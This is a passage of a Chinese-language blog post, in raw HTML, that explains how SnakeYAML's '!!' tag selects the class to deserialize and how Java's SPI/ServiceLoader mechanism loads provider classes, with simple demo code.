51);background-color: rgb(255, 255, 255);font-family: Arial;">用于强制类型转化，</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">!!org.example.User </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">是将该对象转为</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">org.example.User </span><span style="font-size: 15px;font-family: Arial;">类</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">, 如果没有</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> !! </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">则就是个</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> key </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">为字符串的</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> Map </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">，其实这个和</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;">Fastjson</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">的</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;">@type</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">有着异曲同工之妙，</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;font-weight: bold;">用于指定反序列化的全类名.</span></span></p></article><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;B2GS-1663597325704&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;level&#34;:&#34;h3&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;JAnL-1663597325703&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;反序列化&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;p1zj-1663597336301&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;Vohd-1663597336300&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;再来一段反序列化代码，主要是在各个方法中都添加了print，来看一下反序列化时会触发这个类的哪些方法&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;FJlT-1663598081016&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;pmoK-1663598081015&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;User.java&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">反序列化</span></p><p><span style="font-size: 15px;">再来一段反序列化代码，主要是在各个方法中都添加了print，来看一下反序列化时会触发这个类的哪些方法</span></p><p><span style="font-size: 15px;">User.java</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer">package org.example;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">class</span> <span class="code-snippet__title">User</span> {</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    String name;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> age;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__title">User</span>(<span class="code-snippet__params"></span>)</span> {</span></code><code><span class="code-snippet_outer">        System.<span class="code-snippet__keyword">out</span>.println(<span class="code-snippet__string">&#34;User构造函数&#34;</span>);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> String <span class="code-snippet__title">getName</span>(<span class="code-snippet__params"></span>)</span> {</span></code><code><span class="code-snippet_outer">        System.<span class="code-snippet__keyword">out</span>.println(<span class="code-snippet__string">&#34;User.getName&#34;</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> name;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">setName</span>(<span class="code-snippet__params">String name</span>)</span> {</span></code><code><span class="code-snippet_outer">        System.<span class="code-snippet__keyword">out</span>.println(<span class="code-snippet__string">&#34;User.setName&#34;</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">this</span>.name = name;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> String <span class="code-snippet__title">getAge</span>(<span class="code-snippet__params"></span>)</span> {</span></code><code><span class="code-snippet_outer">        System.<span class="code-snippet__keyword">out</span>.println(<span class="code-snippet__string">&#34;User.getAge&#34;</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> name;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">setAge</span>(<span class="code-snippet__params">String name</span>)</span> {</span></code><code><span class="code-snippet_outer">        System.<span class="code-snippet__keyword">out</span>.println(<span class="code-snippet__string">&#34;User.setAge&#34;</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">this</span>.name = name;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p><span style="font-size: 15px;">App.java</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> org.example;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> org.yaml.snakeyaml.Yaml;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">App</span> </span></span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">( String[] args )</span></span></span></code><code><span class="code-snippet_outer">{</span></code><code><span class="code-snippet_outer">        Deserialize();</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">Deserialize</span><span class="code-snippet__params">()</span></span>{</span></code><code><span class="code-snippet_outer">        String s = <span class="code-snippet__string">&#34;!!org.example.User2 {name: xiaobei, age: 18}&#34;</span>;</span></code><code><span class="code-snippet_outer">        Yaml yaml = <span class="code-snippet__keyword">new</span> Yaml();</span></code><code><span class="code-snippet_outer">        User user = yaml.load(s);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6363636363636364" data-s="300,640" style="" data-type="png" data-w="1265" src="https://wechat2rss.xlab.app/img-proxy/?k=e7c2c6e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE6al1Doz9QLnSCAkw9e4ycLiahLBX8GoFdBFWlzAca3rZKHZqfwlIe9w%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 18px;font-weight: bold;letter-spacing: 0.034em;text-align: justify;"></span></p></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;GE8l-1663598182186&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;dlLM-1663598182185&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;反序列化过程中会触发&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;setXX方法&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;和&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;构造方法&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;Xcki-1663598092698&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;glF7-1663598092697&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;注意：在反序列化时候必须确保被反序列化对象的类型修饰符为&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34; public &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;，否则会反序列化爆异常。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">反序列化过程中会触发<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">setXX方法</span>和<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">构造方法</span>。</span><span style="font-size: 15px;letter-spacing: 0.034em;">注意：在反序列化时候必须确保被反序列化对象的类型修饰符为</span><span style="font-size: 15px;letter-spacing: 0.034em;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> public </span><span style="font-size: 15px;letter-spacing: 0.034em;">，否则会反序列化爆异常。</span></p><p><span style="font-size: 15px;letter-spacing: 0.034em;"><br/></span></p><p><span style="font-size: 15px;letter-spacing: 0.034em;"><br/></span></p><p><br/></p><article><p><span style="font-weight: bold;font-size: 20px;">Java SPI 机制</span></p><p><span style="font-weight: bold;font-size: 18px;">简介</span></p><p><span style="font-size: 15px;"><span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Java SPI</span>机制是<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Java</span>提供的一套用来被第三方实现或者扩展的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">API</span>，它可以用来启动框架扩展和替换组件。</span></p><p><span style="font-size: 15px;">常见的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">SPI</span>有<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">JDBC</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Spring</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Spring Boot</span>相关<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">starter</span>组件、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Dubbo</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">JNDI</span>、<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">日志接口</span>等.</span></p><p><span style="font-size: 15px;">SPI全称Service Provider Interface，是Java提供的一套用来被第三方实现或者扩展的接口，它可以用来启用框架扩展和替换组件。SPI的作用就是为这些被扩展的API寻找服务实现。</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-size: 15px;">API （Application Programming Interface）在大多数情况下，都是实现方制定接口并完成对接口的实现，调用方仅仅依赖接口调用，且无权选择不同实现。从使用人员上来说，API 直接被应用开发人员使用。</span></p></li><li><p><span style="font-size: 15px;">SPI （Service Provider Interface）是调用方来制定接口规范，提供给外部来实现，调用方在调用时则选择自己需要的外部实现。从使用人员上来说，SPI 被框架扩展人员使用。</span></p></li></ul><p><span style="font-size: 15px;"><span style="color: rgb(31, 9, 9);">也就是说，SPI是一种服务发现机制，它是通过在</span><span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">CLASSPATH</span><span style="color: rgb(31, 9, 9);">路径下的</span><span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">META-INF/services</span><span style="color: rgb(31, 9, 9);">文件夹查找文件，然后自动加载文件里所定义的类，相当于动态的为某个接口</span><span style="font-weight: bold;color: rgb(31, 9, 9);">(API)</span><span style="color: rgb(31, 9, 9);">寻找服务实现；也就是说，我们可以通过在</span><span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">META-INF/services</span><span style="color: rgb(31, 9, 9);">下创建一个以服务接口命名的文件，这个文件里面的内容就是这个接口的具体实现类的完整类名，在加载这个接口的时候就会实例化这里面写上的那个类名。</span></span></p><p><span style="font-weight: bold;font-size: 18px;">使用介绍</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p>当服务提供者提供了接口的一种具体实现后, 在<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">jar</span>包的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">META-INF/services</span>目录下创建一个以<span style="font-weight: bold;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">&#34;包名 + 接口名&#34;</span>为命名的文件，内容为实现该接口的类的名称.</p></li><li><p>接口实现类所在的<span style="background-color: rgb(243, 244, 244);">jar</span>包放在主程序的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">classpath</span>中.</p></li><li><article><p>主程序通过<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">java.util.ServiceLoder</span>动态装载实现模块，通过在<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">META-INF/services</span>目录下的配置文件找到实现类的类名，利用反射动态把类加载到<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">JVM</span>.</p></article></li></ul></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.331353919239905" data-s="300,640" style="" data-type="png" data-w="842" src="https://wechat2rss.xlab.app/img-proxy/?k=9394071e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEicN3uagPxCyq1hSvJ5hdJFiaPyDkPosdMMMkPJFNq5T4JaNtRohLA0rA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><article><p><span style="color: rgb(31, 9, 9);font-weight: bold;font-size: 18px;">实现原理</span></p><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(31, 9, 9);">程序会通过</span><span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">java.util.ServiceLoader</span><span style="font-size: 15px;color: rgb(31, 9, 9);">动态装载实现模块，在</span><span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">META-INF/services</span><span style="font-size: 15px;color: rgb(31, 9, 9);">目录下的配置文件中寻找实现类的类名，再通过</span><span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">Class.forName</span><span style="font-size: 15px;color: rgb(31, 9, 9);">加载进来，再通过</span><span style="font-size: 15px;color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">newInstance()</span><span style="font-size: 15px;color: rgb(31, 9, 9);">来创建对象，并且存到缓存和列表里面。</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.55096011816839" data-s="300,640" style="" data-type="png" data-w="677" src="https://wechat2rss.xlab.app/img-proxy/?k=e6ad38ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEic00DicpjCtD73pEFmjfacI739nbFjqrTibBg7On4bicuTHGX09tgD1pSg%2F640%3Fwx_fmt%3Dpng"/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;Prxq-1663598547142&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;a3QY-1663598547141&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;DataSoure(服务接口)&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">DataSoure(服务接口)</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> MySPI;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">interface</span> <span class="code-snippet__title">DataSource</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">void</span> <span class="code-snippet__title">Driver</span><span class="code-snippet__params">()</span></span>;</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;FwTf-1663598547844&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;WbHr-1663598547843&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Mysql服务提供者&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">Mysql服务提供者</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">package</span> MySPI;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">public</span> <span class="code-snippet__class"><span class="code-snippet__keyword">class</span> <span class="code-snippet__title">Mysql</span> <span class="code-snippet__keyword">implements</span> <span class="code-snippet__title">DataSource</span></span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__meta">@Override</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__function"><span class="code-snippet__keyword">public</span> <span class="code-snippet__keyword">void</span> <span class="code-snippet__title">Driver</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">        System.out.println(<span class="code-snippet__string">&#34;This is Mysql DataSource&#34;</span>);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;kxnd-1663598493905&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;k0ER-1663598493904&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Oracle服务提供者&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">Oracle服务提供者</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer">package MySPI;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">public class Oracle implements DataSource{</span></code><code><span class="code-snippet_outer">    @Override</span></code><code><span class="code-snippet_outer">    public void Driver() {</span></code><code><span class="code-snippet_outer">        System.out.println(&#34;This is Oracle DataSource&#34;);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;SoUj-1663598570380&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;Z4ff-1663598570379&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;Mssql服务提供者&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">Mssql服务提供者</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer">package MySPI;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">public class Mssql implements DataSource{</span></code><code><span class="code-snippet_outer">    @Override</span></code><code><span class="code-snippet_outer">    public void Driver() {</span></code><code><span class="code-snippet_outer">        System.out.println(&#34;This is Mssql DataSource&#34;);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;X5r4-1677909032551&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;uagR-1677909032550&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;SPIUsage(模拟使用者)&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">SPIUsage(模拟使用者)</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="java"><code><span class="code-snippet_outer">package MySPI;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">import java.util.Iterator;</span></code><code><span class="code-snippet_outer">import java.util.ServiceLoader;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">public class SPIUseage {</span></code><code><span class="code-snippet_outer">    public static void main(String[] args) {</span></code><code><span class="code-snippet_outer">        ServiceLoader&lt;DataSource&gt; load = ServiceLoader.load(DataSource.class);</span></code><code><span class="code-snippet_outer">        Iterator&lt;DataSource&gt; iterator = load.iterator();</span></code><code><span class="code-snippet_outer">        while(iterator.hasNext()){</span></code><code><span class="code-snippet_outer">            iterator.next().Driver();</span></code><code><span class="code-snippet_outer">        }</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;EDDG-1663598570579&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;8Yjf-1663598570578&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;服务列表文件&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;ewWh-1677909128025&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;bTcX-1677909128023&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;需要注意的是这里由于是&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;Maven&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;项目，故我们的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;META-INF&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;以及&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;serivces&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;文件夹还有服务列表文件都是放到&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;resources&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#FF0001&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;目录下。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">服务列表文件</span></p><p><span style="font-size: 15px;">需要注意的是这里由于是<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">Maven</span>项目，故我们的<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">META-INF</span>以及<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">serivces</span>文件夹还有服务列表文件都是放到<span style="color: rgb(255, 0, 1);background-color: rgb(253, 238, 238);">resources</span>目录下。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4027777777777778" data-s="300,640" style="" data-type="png" data-w="936" src="https://wechat2rss.xlab.app/img-proxy/?k=1a7088ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEorBZjLia6LJZxww8XNCiaeZSqutBibzgpalp8Wtxuu2f03aICC2JE14qQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;mmHg-1677909197098&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;Arz3-1677909197096&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;测试使用&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;bold&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;">测试使用</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.37305699481865284" data-s="300,640" style="" data-type="png" data-w="1544" src="https://wechat2rss.xlab.app/img-proxy/?k=91632446&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEgx8KwvvgD2fROx8SsjDxAfsoOxs1OhRsNIomxO5P536lX2iaiaqSsE6w%2F640%3Fwx_fmt%3Dpng"/></p></article><p><br/></p><p><br/></p><article 